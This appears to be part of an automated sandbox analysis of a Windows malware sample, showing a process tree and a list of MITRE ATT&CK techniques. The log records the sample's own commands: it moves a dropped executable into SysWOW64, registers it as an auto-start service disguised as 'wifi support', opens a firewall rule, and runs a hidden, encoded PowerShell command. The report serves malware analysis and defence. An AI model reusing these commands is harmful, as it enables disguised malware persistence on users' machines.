C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8116

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8764

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8836

C:\Users\Admin\AppData\Local\Temp\F136.exe
C:\Users\Admin\AppData\Local\Temp\F136.exe
1⤵
PID:9000
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\aigykcyt\
  2⤵
  PID:5456
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wblgamjl.exe" C:\Windows\SysWOW64\aigykcyt\
  2⤵
  PID:8844
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" create aigykcyt binPath= "C:\Windows\SysWOW64\aigykcyt\wblgamjl.exe /d\"C:\Users\Admin\AppData\Local\Temp\F136.exe\"" type= own start= auto DisplayName= "wifi support"
  2⤵
  PID:8340
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" description aigykcyt "wifi internet conection"
  2⤵
  PID:8660
- C:\Windows\SysWOW64\sc.exe
  "C:\Windows\System32\sc.exe" start aigykcyt
  2⤵
  PID:8108
- C:\Windows\SysWOW64\netsh.exe
  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
  2⤵
  PID:7720

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8300

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8400

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2388

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8152

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4000

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5928

C:\Windows\SysWOW64\aigykcyt\wblgamjl.exe
C:\Windows\SysWOW64\aigykcyt\wblgamjl.exe /d"C:\Users\Admin\AppData\Local\Temp\F136.exe"
1⤵
PID:3164
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:8456

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t You're about to be signed out -m Windows will shut down in less than a minute. -a 3
1⤵
PID:9692

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3aff855 /state1:0x41c64e6d
1⤵
PID:8336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:9128

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:6096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:7500

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
- Executes dropped EXE
PID:5552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:8344

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7792

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:7996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:9160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:9516

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8360

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4012

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery